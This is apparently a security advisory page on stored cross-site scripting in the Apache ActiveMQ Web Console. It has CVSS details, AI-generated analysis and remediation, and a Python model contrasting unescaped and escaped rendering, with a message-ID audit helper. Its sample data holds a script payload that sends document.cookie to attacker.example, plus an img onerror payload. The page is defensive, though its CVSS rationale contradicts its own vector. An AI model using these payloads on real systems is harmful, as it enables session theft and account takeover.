GHSA-j548-68g5-9j7x
Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Rationale: producer authentication is required (this rationale assigns PR:L, while the vendor vector above records PR:N; the two disagree); an administrator must browse the affected queue, so UI:R; the script executes in the administrator's browser, so scope changes (S:C), with limited, session-level confidentiality and integrity impact (C:L/I:L).
Primary rating from Vendor (CNA).
CVSS Vector (Vendor)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
Description: PRE-NVD
Analysis (AI-generated)
Stored cross-site scripting in the Apache ActiveMQ Web Console allows an authenticated message producer to inject JavaScript via a crafted JMS message ID; the script executes in the browser of any administrator who browses the affected queue. The queue browse page renders message IDs without HTML escaping, so a producer can escalate to administrator via session hijacking or credential theft. …
Attack Chain (AI-derived)
Hypothetical attack flow derived from CVE metadata
Vulnerability Assessment (AI-generated)
| Aspect | Assessment |
|---|---|
| Exploitation | The attacker must hold authenticated credentials as a JMS message producer with write access to at least one queue on the target broker; unauthenticated exploitation is not possible. … |
| Risk Assessment | No CVSS vector had been published by NVD at the time of analysis, so all metric assessments are independently derived from the description. … |
| Exploit Scenario | An attacker with valid message-producer credentials connects to the ActiveMQ broker and publishes a message whose JMS message ID is set to a value containing an HTML script tag with JavaScript (for example, a session-stealing payload that reads document.cookie). The malicious message ID is stored in the broker. … |
| Remediation | Upgrade to Apache ActiveMQ 6.2.7 (6.x deployments) or 5.19.8 (5.x deployments), both released June 29, 2026 and confirmed as the official fixes by the Apache advisory at https://activemq.apache.org/. … |
Recommended Action (AI-generated)
Within 24 hours: inventory all ActiveMQ Web Console instances; audit and list all message producer accounts with active credentials. …
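The weakness described above (a browse page that writes broker-supplied message IDs straight into HTML) and the audit step in the recommended action can both be illustrated with a small model. The following is an added example written for this page; it is not code from vuln.today or from the Apache ActiveMQ project. The row markup, the assumed shape of a broker-generated ID, and every sample message are constructed for illustration, not copied from the Web Console. `render_browse_row_vulnerable` mirrors the unescaped rendering, `render_browse_row_hardened` shows the fix (HTML escaping for the element context), and `audit_message_ids` is a triage helper that scans the IDs of messages already stored in a queue for HTML metacharacters or an unexpected shape, since a malicious message persists in the broker until it is consumed or purged.

```python
"""Added example, not code from vuln.today or from Apache ActiveMQ.

Models the weakness the advisory describes: a queue-browse page that writes
JMS message IDs into HTML without escaping. The markup, the expected ID
shape and all sample messages below are assumptions constructed for
illustration.
"""
import html
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class BrowsedMessage:
    message_id: str
    destination: str
    body: str


# Constructed sample of a queue browse. The last three IDs are illustrative
# attacker-supplied values of the kind the exploit scenario describes.
SAMPLE_BROWSE = [
    BrowsedMessage("ID:broker1-41251-1700000000000-1:1:1:1:1", "orders", "order=1"),
    BrowsedMessage("ID:broker1-41251-1700000000000-1:1:1:1:2", "orders", "order=2"),
    BrowsedMessage(
        '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
        "orders",
        "x",
    ),
    BrowsedMessage("ID:<img src=x onerror=alert(1)>", "orders", "x"),
    BrowsedMessage("custom-id-without-broker-prefix", "audit", "y"),
]


def render_browse_row_vulnerable(msg: BrowsedMessage) -> str:
    """The pattern the advisory describes: the ID goes into markup unescaped."""
    return f"<tr><td>{msg.message_id}</td><td>{msg.destination}</td></tr>"


def render_browse_row_hardened(msg: BrowsedMessage) -> str:
    """Fix: escape every broker-supplied string for the HTML element context."""
    return (
        f"<tr><td>{html.escape(msg.message_id, quote=True)}</td>"
        f"<td>{html.escape(msg.destination, quote=True)}</td></tr>"
    )


# Any '<' that does not start one of the template's own <tr>/<td> tags came
# from untrusted data and would be parsed as markup by the browser.
_FOREIGN_TAG = re.compile(r"<(?!/?t[dr]>)")


def row_contains_foreign_markup(rendered_row: str) -> bool:
    return _FOREIGN_TAG.search(rendered_row) is not None


# Characters with meaning in an HTML element or attribute context.
_HTML_META = re.compile(r"""[<>"'&]""")
# Assumed approximation of a broker-generated ID (hypothetical shape):
#   ID:<connection-id>:<session>:<producer>:<sequence>
_EXPECTED_ID = re.compile(r"^ID:[A-Za-z0-9._-]+:\d+:\d+:\d+:\d+$")


def audit_message_ids(messages):
    """Return (message_id, destination, reason) for every suspicious ID.

    A broker-generated ID is not expected to contain HTML metacharacters, so
    their presence is the strongest signal; an ID that merely fails the
    assumed shape is reported with a weaker reason for manual review.
    """
    flagged = []
    for m in messages:
        if _HTML_META.search(m.message_id):
            flagged.append((m.message_id, m.destination, "html-metacharacters"))
        elif not _EXPECTED_ID.match(m.message_id):
            flagged.append((m.message_id, m.destination, "unexpected-shape"))
    return flagged


if __name__ == "__main__":
    for m in SAMPLE_BROWSE:
        vuln = render_browse_row_vulnerable(m)
        safe = render_browse_row_hardened(m)
        print(f"{m.message_id[:40]!r:44} unescaped-injects={row_contains_foreign_markup(vuln)} "
              f"escaped-injects={row_contains_foreign_markup(safe)}")
    for message_id, dest, reason in audit_message_ids(SAMPLE_BROWSE):
        print(f"FLAG {dest}: {reason}: {message_id!r}")
```

The audit helper reports two reasons so that a high-confidence hit (HTML metacharacters in an ID) can be acted on immediately, while an ID that only deviates from the assumed shape is queued for review; feed it whatever your browse tooling returns for each queue, and treat any flagged destination as one an administrator should not open in an unpatched console.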
Related Apache ActiveMQ advisories:
- Memory Allocation with Excessive Size Value vulnerability in Apache ActiveMQ. Rated medium severity (CVSS 6.9) …
- Remote code execution in Apache ActiveMQ Broker, ActiveMQ All, and ActiveMQ (versions before 5.19.7 and 6.0.0 before 6.2…
- Denial of service in Apache ActiveMQ (versions before 5.19.8, and 6.0.0 before 6.2.7) lets an authenticated user crash …
- Unbounded heap consumption in Apache ActiveMQ's STOMP NIO codec allows an unauthenticated remote client to crash the …
- Unauthorized message consumption in Apache ActiveMQ Classic lets a connected client read from temporary destinations …
Same weakness: CWE-79 – Cross-site Scripting (XSS)
EUVD identifier: EUVD-2026-40279